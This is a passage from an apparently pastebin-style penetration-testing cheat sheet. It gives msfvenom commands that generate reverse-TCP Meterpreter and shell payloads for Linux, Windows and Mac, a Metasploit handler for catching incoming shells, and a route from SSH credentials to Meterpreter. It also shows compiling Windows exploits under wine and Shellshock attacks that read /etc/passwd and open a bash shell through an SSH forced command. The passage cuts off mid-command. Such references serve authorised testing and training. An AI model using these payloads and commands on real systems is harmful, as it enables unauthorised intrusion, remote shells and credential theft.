  847. For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
  848.  
  849. ​Linux Based Shellcode
  850.  
  851. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
  852.  
  853. ​Windows Based Shellcode
  854.  
  855. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
  856.  
  857. ​Mac Based Shellcode
  858.  
  859. msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
  860.  
  861. ​Handlers​ Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
  862.  
  863. use exploit/multi/handler set PAYLOAD
  864. set LHOST
  865. set LPORT
  866.  
  867. set ExitOnSession false
  868.  
  869. exploit -j -z
  870.  
  871. Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
  872.  
  873.     ●  SSH to Meterpreter:
  874.     use auxiliary/scanner/ssh/ssh_login
  875.     use post/multi/manage/shell_to_meterpreter ​https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
  876.  
  877.     ●  Compiling Windows Exploits on Kali
  878.  
  879.         ○  wget -O mingw-get-setup.exe
  880.  
  881.         http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/downloa d
  882.  
  883.         wine mingw-get-setup.exe select mingw32-base
  884.  
  885.         ○  cd /root/.wine/drive_c/windows
  886.         wget​ ​http://gojhonny.com/misc/mingw_bin.zip​ && unzip mingw_bin.zip cd /root/.wine/drive_c/MinGW/bin
  887.         wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  888.         wine ability.exe
  889.  
  890.     ●  Cross Compiling Exploits
  891.  
  892. gcc -m32 -o output32 hello.c (32 bit) gcc -m64 -o output hello.c (64 bit)
  893.  
  894. ● Shellshock
  895.  
  896.     ○  git clone​ ​https://github.com/nccgroup/shocker
  897.  
  898.     ○  ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
  899.  
  900.     ○  Shell Shock SSH Forced Command
  901.     Check for forced command by enabling all debug output with ssh ssh -vvv
  902.     ssh -i noob noob@$ip '() { :;}; /bin/bash'
  903.  
  904.     ○  cat file (view file contents)
  905.     echo -e "HEAD /cg
Parsed in 0.261 seconds